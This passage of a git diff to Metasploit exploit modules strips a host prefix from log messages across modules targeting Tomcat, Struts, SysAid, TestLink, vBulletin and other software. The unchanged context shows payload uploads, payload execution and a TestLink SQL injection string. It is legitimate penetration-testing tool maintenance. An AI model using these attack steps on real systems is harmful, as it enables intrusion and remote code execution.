uri[-1,1] != '/' base = File.dirname("#{uri}.") - print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") cookie = do_login(base) if cookie.empty? - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index 044b7584f6..c2b3a72a7b 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...") + print_status("Uploading Information Gathering JSP #{jsp_info}...") if upload(jsp_info, jsp_path) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed") end @@ -75,17 +75,17 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, jsp_info)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") - print_warning("#{peer} - #{jsp_info} needs to be deleted manually") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") + print_warning("#{jsp_info} needs to be deleted manually") end jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end @@ -93,10 +93,10 @@ class Metasploit3 < Msf::Exploit::Remote if upload_path register_file_for_cleanup(::File.join(upload_path, jsp_payload)) else - print_warning("#{peer} - #{jsp_payload} needs to be deleted manually") + print_warning("#{jsp_payload} needs to be deleted manually") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index e35f6bf4b7..c1fd88b671 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -158,13 +158,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get Tomcat installation path - print_status("#{peer} - Retrieving Tomcat installation path...") + print_status("Retrieving Tomcat installation path...") if install_path.nil? fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path") end - print_good("#{peer} - Tomcat installed on #{install_path}") + print_good("Tomcat installed on #{install_path}") if target['Platform'] == "java" exploit_java @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_java - print_status("#{peer} - Uploading WAR file") + print_status("Uploading WAR file") app_base = rand_text_alphanumeric(4+rand(32-4)) war = payload.encoded_war({ :app_name => app_base }).to_s @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable file") + print_status("Uploading executable file") exe = payload.encoded_exe exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8)) if target['Platform'] == "win" diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 79a444c8dc..479ce0f89f 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -147,13 +147,13 @@ class Metasploit3 < Msf::Exploit::Remote def check_log_file(hint) uri = normalize_uri("/", @jsp_file) - print_status("#{peer} - Waiting for the server to flush the logfile") + print_status("Waiting for the server to flush the logfile") 10.times do |x| select(nil, nil, nil, 2) # Now make a request to trigger payload - vprint_status("#{peer} - Countdown #{10-x}...") + vprint_status("Countdown #{10-x}...") res = dump_line(uri) # Failure. The request timed out or the server went away. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/ - print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}") + print_good("Log file flushed at http://#{peer}/#{@jsp_file}") return true end end @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = payload.encoded print_status("JSP payload available on #{unc}...") - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'version' => '1.1', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/') jsp_shell << "/#{self.file_name}" - print_status("#{peer} - Accessing JSP shell at #{jsp_shell}...") + print_status("Accessing JSP shell at #{jsp_shell}...") send_request_cgi({ 'uri' => normalize_uri(jsp_shell), 'version' => '1.1', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Modify the Class Loader - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") properties = { :directory => 'webapps/ROOT', :prefix => prefix_jsp, @@ -274,11 +274,11 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@jsp_file) # Prepare the JSP - print_status("#{peer} - Generating JSP...") + print_status("Generating JSP...") jsp = create_jsp # Dump the JSP to the log file - print_status("#{peer} - Dumping JSP into the logfile...") + print_status("Dumping JSP into the logfile...") random_request = rand_text_alphanumeric(3 + rand(3)) uri = normalize_uri('/', random_request) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index bf8bbb31b9..e9e568a9ee 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, 'Unsupported target platform!') end - print_status("#{peer} - Uploading exploit to #{payload_exe}") + print_status("Uploading exploit to #{payload_exe}") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote append = true end java_upload_part(pl_exe, payload_exe, append) - print_status("#{peer} - Executing payload") + print_status("Executing payload") execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(payload_exe) diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 4a8a64da2c..2d879862d2 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_exploit - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/ if is_exploit - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end return $1 @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote return target end - print_status("#{peer} - Determining target") + print_status("Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} url = upload_payload(os_finder_payload, false) @@ -233,13 +233,13 @@ class Metasploit3 < Msf::Exploit::Remote unless @cookie fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.") end - print_status("#{peer} - Authentication was successful with the provided credentials.") + print_status("Authentication was successful with the provided credentials.") @my_target = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") end - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup('root/' + jsp_path) end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_path), 'method' => 'GET', diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index 2eb0ab33e0..d2ecb468b3 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def send_payload(war_payload, tomcat_path, app_base) # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), 'method' => 'POST', @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting for deployment") + print_status("Upload appears to have been successful, waiting for deployment") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directory") + print_status("Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success! Triggered the payload, should have a shell incoming return if res.code == 200 end - print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...") + print_error("Failed to launch payload. Trying one last time with a different path...") # OK this might be a Linux server, it's a different traversal path. # Let's try again... @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index b64dc1083e..b5096db680 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project <a href="http:\/\/testlink\.sourceforge\.net\/docs\/testLink\.php">Home<\/a><br \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -158,29 +158,29 @@ class Metasploit3 < Msf::Exploit::Remote # register an account user = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Registering user (#{user})") + print_status("Registering user (#{user})") res = register(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Registered successfully") + print_status("Registered successfully") else - print_error("#{peer} - Registration failed") + print_error("Registration failed") return end # login - print_status("#{peer} - Authenticating user (#{user})") + print_status("Authenticating user (#{user})") res = login(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end # set id and table name id = rand(1000)+1 table = 'nodes_hierarchy' - print_status("#{peer} - Setting id (#{id}) and table name (#{table})") + print_status("Setting id (#{id}) and table name (#{table})") begin res = send_request_cgi({ 'method' => 'GET', @@ -188,35 +188,35 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 - print_status("#{peer} - Setting id and table name successfully") + print_status("Setting id and table name successfully") else - print_error("#{peer} - Setting id and table name failed") + print_error("Setting id and table name failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, fname, php) if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from directory index - print_status("#{peer} - Retrieving real file name from directory index.") + print_status("Retrieving real file name from directory index.") begin res = send_request_cgi({ 'method' => 'GET', @@ -224,19 +224,19 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from directory index.") + print_error("Could not retrieve file name from directory index.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from the database if @token.nil? - print_status("#{peer} - Retrieving real file name from the database.") + print_status("Retrieving real file name from the database.") sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" begin res = send_request_cgi({ @@ -246,26 +246,26 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from the database.") + print_error("Could not retrieve file name from the database.") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{@token}.php)") + print_status("Executing payload (#{@token}.php)") begin send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index b8b674d5c3..1098c9140f 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote return CheckCode::Unknown if res.nil? if res.code.between?(400, 499) - vprint_error("#{peer} - Server rejected the credentials") + vprint_error("Server rejected the credentials") return CheckCode::Unknown end @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote arch = detect_arch(res.body) return CheckCode::Unknown unless plat and arch - vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") + vprint_status("Tomcat Manager found running on #{plat} platform and #{arch} architecture") report_tomcat_credential @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Find the session ID and the CSRF token # - print_status("#{peer} - Retrieving session ID and CSRF token...") + print_status("Retrieving session ID and CSRF token...") unless access_manager? fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload Payload # - print_status("#{peer} - Uploading and deploying #{@app_base}...") + print_status("Uploading and deploying #{@app_base}...") if upload_payload report_tomcat_credential else @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Execute Payload # - print_status("#{peer} - Executing #{@app_base}...") + print_status("Executing #{@app_base}...") unless execute_payload fail_with(Failure::Unknown, "Failed to execute the payload") end @@ -171,9 +171,9 @@ class Metasploit3 < Msf::Exploit::Remote # # Delete the deployed payload # - print_status("#{peer} - Undeploying #{@app_base} ...") + print_status("Undeploying #{@app_base} ...") unless undeploy_app - print_warning("#{peer} - Failed to undeploy #{@app_base}...") + print_warning("Failed to undeploy #{@app_base}...") end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => path) unless res and res.code == 200 - vprint_error("#{peer} - Failed: Error requesting #{path}") + vprint_error("Failed: Error requesting #{path}") return nil end @@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote def find_csrf(res = nil) return "" if res.blank? - vprint_status("#{peer} - Finding CSRF token...") + vprint_status("Finding CSRF token...") body = res.body @@ -343,17 +343,17 @@ class Metasploit3 < Msf::Exploit::Remote def upload_payload war = war_payload upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") - vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") + vprint_status("Uploading #{war.length} bytes as #{@app_base}.war ...") res = send_war_payload(upload_path, war) unless res - vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") + vprint_error("Upload failed on #{upload_path} [No Response]") return false end if res.code < 200 or res.code >= 300 vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 - vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]") + vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") return false end @@ -363,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_payload jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") - vprint_status("#{peer} - Executing #{jsp_path}...") + vprint_status("Executing #{jsp_path}...") res = send_request_cgi({ 'uri' => jsp_path, @@ -375,12 +375,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_execute_response(res) unless res - vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") + vprint_error("Execution failed on #{@app_base} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") + vprint_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]") return false end @@ -392,12 +392,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_undeploy(undeploy_url) unless res - vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") + vprint_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") + vprint_warning("Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") return false end diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 3e4a56ed4a..7647d7b20d 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb +++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading PHP to Up.Time server") + print_status("Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote "script" => php_payload }) - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 1238434ece..15f48e6c1a 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to inferprint the instance...") + print_status("Trying to inferprint the instance...") @my_target = target check_code = check @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index 9c4c7972c0..88d5e8285f 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -75,15 +75,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index d8c06a41c1..6769172a7a 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -89,15 +89,15 @@ class Metasploit3 < Msf::Exploit::Remote soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ - print_good("#{peer} - Upload successfully uploaded") + print_good("Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0) end diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 41e4dfa4da..8531ee69dc 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote "form-data; name=\"file\"; filename=\"#{fname}\"" #Content Disposition ) - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/work/resultimage.php"), @@ -115,18 +115,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end @target_path = normalize_uri("#{base}/results/#{fname}") - print_status("#{peer} - Requesting #{@target_path}") + print_status("Requesting #{@target_path}") res = send_request_cgi({'uri'=>@target_path}) handler if res and res.code == 404 - print_error("#{peer} - Payload failed to upload") + print_error("Payload failed to upload") end end end diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 71c2f8d6eb..18503fd504 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -209,13 +209,13 @@ class Metasploit3 < Msf::Exploit::Remote @base = normalize_uri(target_uri.path) @base << '/' if @base[-1, 1] != '/' - print_status("#{peer} - Getting cookie") + print_status("Getting cookie") cookie = get_cookie - print_status("#{peer} - Logging in") + print_status("Logging in") cred = login(cookie) - print_status("#{peer} - Triggering spam logging") + print_status("Triggering spam logging") inject_exec(cred) handler diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index f58aa5b783..b22c77322b 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file to #{tomcat_path}") + print_status("Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote } }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else - print_error("#{peer} - Failed to upload, try again with a different path?") + print_error("Failed to upload, try again with a different path?") return false end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote Rex.sleep(2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index c6861a0ea3..fcecbbebdf 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote if fingerprint =~ /Data Protector A\.(\d+\.\d+)/ version = $1 - vprint_status("#{peer} - Windows / HP Data Protector version #{version} found") + vprint_status("Windows / HP Data Protector version #{version} found") elsif fingerprint =~ / INET/ - vprint_status("#{peer} - Linux / HP Data Protector found") + vprint_status("Linux / HP Data Protector found") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -106,25 +106,25 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_exec = rand_text_alpha(8) - print_status("#{peer} - Leaking the HP Data Protector directory...") + print_status("Leaking the HP Data Protector directory...") leak = leak_hp_directory(rand_exec) dir = parse_dir(leak, rand_exec) if dir.nil? dir = default_hp_dir - print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}") + print_error("HP Data Protector dir not found, using the default #{dir}") else unless valid_target?(dir) - print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") + print_error("HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") end end if target.name =~ /Windows/ #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true}) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_windows(payload.encoded, dir) else - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute_linux(payload.encoded, dir) end end @@ -265,10 +265,10 @@ class Metasploit3 < Msf::Exploit::Remote def parse_dir(data, clue) if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/ dir = $1 - print_good("#{peer} - HP Data Protector directory found on #{dir}") + print_good("HP Data Protector directory found on #{dir}") else dir = nil end diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 3bd4d88285..2304aa8855 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -265,7 +265,7 